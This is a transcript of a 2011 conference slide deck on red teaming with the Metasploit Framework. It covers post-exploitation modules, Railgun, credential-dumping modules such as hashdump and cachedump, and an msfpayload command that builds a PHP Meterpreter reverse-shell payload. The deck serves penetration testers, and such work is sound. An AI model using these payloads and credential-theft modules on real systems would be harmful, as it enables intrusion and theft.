Deep Dive Into Red Teaming With the it Framework
-
Upload
gopinath6015620 -
Category
Documents
-
view
232 -
download
0
Transcript of Deep Dive Into Red Teaming With the it Framework
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
1/28
Deep Dive into Red Teamingwith the Metasploit Framework
1
James egyp7 Lee March 22, 2011
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
2/28
Outline
Metasploit Framework architecture What are Metasploit modules?
Post-exploitation modules
Building other types of payloads
Platform-agnostic payloads
New Metasploit Express/Pro features
Live Demo
This presentation is for advancedMetasploit Framework users !
2
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
3/28
Metasploit Project founded in 2003 Open Source penetration testing platform based with over
1 million downloads in the past year
Acquired by Rapid7 in 2009
HD Moore joined Rapid7 as Chief Security Office and Chief Architect of Metasploit
Rapid7 remains committed to the Community
Metasploit Framework is the foundation for thecommercial editions Metasploit Express and MetasploitPro
Metasploit overview
3
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
4/28
LIBRARIES
MODULES
INTERFACES
Rex
MSF Core
MSF Base
Payload Encoder NOP Auxiliary
Console
CLI
PLUGINS
TOOLS
RPC
Exploit
GUI &Armitage
Metasploit Framework architecture
4
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
5/28
LIBRARIES
MODULES
INTERFACES
Rex
MSF Core
MSF Base
Payload Encoder NOP Auxiliary
Console
CLI
PLUGINS
TOOLS
RPC
Exploit
GUI &Armitage
Metasploit Framework architecture
5
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
6/28
What are Metasploit modules?
More than just exploits Payloads the arbitrary code you hear about in
advisories
Encoders add entropy to payloads, remove bad
characters NOP create sophisticated nopsleds
Auxiliary Like an exploit module but without a payload Underappreciated
6
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
7/28
LIBRARIES
MODULES
INTERFACES
Rex
MSF Core
MSF Base
Payload Encoder NOP Auxiliary
Console
CLI
PLUGINS
TOOLS
RPC
Exploit
GUI &Armitage
Metasploit Framework architecture
7
Post
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
8/28
Back in the day
Best post-exploitation option was irb Still staggeringly useful but hard to automate
Enter: Meterpreter scripts
8
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
9/28
Meterpreter scripts
Good
Re-read before every run Easier development
Simple interface Anything Ruby can do
Access to the frameworkand the session
Not so good
No structure
No meta data
No generic compatibilitychecks
Ad-hoc options
Only work on Meterpreter
Not easy to reuse code
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
10/28
New hotness: post-exploitation modules
Newest and least-explored module type Great place to start contributing to the framework
Intended to replace Meterpreter scripts Should retain good aspects
Improve the not-so-good aspects
Post
10
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
11/28
Keeping the good
Always reloaded when run from meterpreter> Can use reload and rerun commands in msf>
Simple Interface
Anything Ruby can do
Access to the Framework and the session Actually easier than scripts
11
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
12/28
Improving the not-so-good
Structured like other module types Improves consistency Includes metadata like author, description, etc.
Option setting consistent with other modules
set VAR value mixins for some common tasks, more on the way
File system manipulation Registry twiddling Running commands
12
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
13/28
Using post-exploitation modules
Like exploits, can be Active or Passive Like aux, add run command, exploit is an alias Take a session option
Define what kinds of sessions are compatible Meterpreter, shell Different platforms
13
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
14/28
Three ways to run them
Directly from meterpreter> with run command run post/windows/gather/resolve_sid SID=S-1-5-1
Via normal module interface use post/windows/gather/resolve_sid set SID S-1-5-1 run
As an AutoRunScript use exploit/some/module set AutoRunScript
post/windows/gather/resolve_sid SID=S-1-5-1 exploit
14
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
15/28
Railgun
Not new exactly, but undergoing some majorimprovements
Arbitrary Ruby -> remote Windows API bridge
Call any function in any DLL on the system
Use an applications own API against it Chrome/Firefox stored passwords Many potential uses here
15
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
16/28
Loot
Pilfered data Can be anything, stored in a file
Process listing Environment variables
Usually not passwords (use Creds table for that)
16
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
17/28
Awesome Post Modules
Hashdump Similar in function to the hashdump command
Instead of injecting into lsass, just reads the registry Calculates everything necessary to pull hashes directly out of SAM
Theres an OSX version now! Reads /var/db/shadow/hash/ Grabs SHA1, NT, and LM hashes
17
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
18/28
Third-party post-exploitation modules
Cachedump from Maurizio Agazzini Like hashdump , but grabs cached credentials mscash format for easy cracking (cant be used with pass -the-
hash) Gets credentials from terminal services/rdp users Will eventually be merged into trunk but serves as an example of
adding your own stuff
18
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
19/28
Modules in the works
Something for going from shell -> Meterpreter And from Java/PHP -> native Meterpreter
Local exploits! Already have modules for four windows privilege escalations
And a generic service auditor Also planning to implement Linux local exploits for shell sessions
Porting scripts to the module format
19
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
20/28
Where to put it
Official modules live in msf3/modules/ Subdirectories organized by module type ( exploit/,
auxiliary/, post/, )
~/.msf3/modules/ has same structure, loaded atstartup if it exists
20
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
21/28
Platform-agnostic payloads
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
22/28
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
23/28
PHP
msfpayload php/meterpreter_reverse_tcpLHOST=192.168.99.1 R > foo.php
23
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
24/28
Commercial Feature Highlights
Pro console! All of theabove and more is easilyaccessible in
Metasploit ProConsole
24
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
25/28
Commercial Feature Highlights
Post-exploitationModules inMetasploit
Pro/Express
25
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
26/28
Commercial Feature Highlights
Host tags are Awesome
26
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
27/28
-
8/7/2019 Deep Dive Into Red Teaming With the it Framework
28/28
Questions?
@egyp7
James egyp7 Lee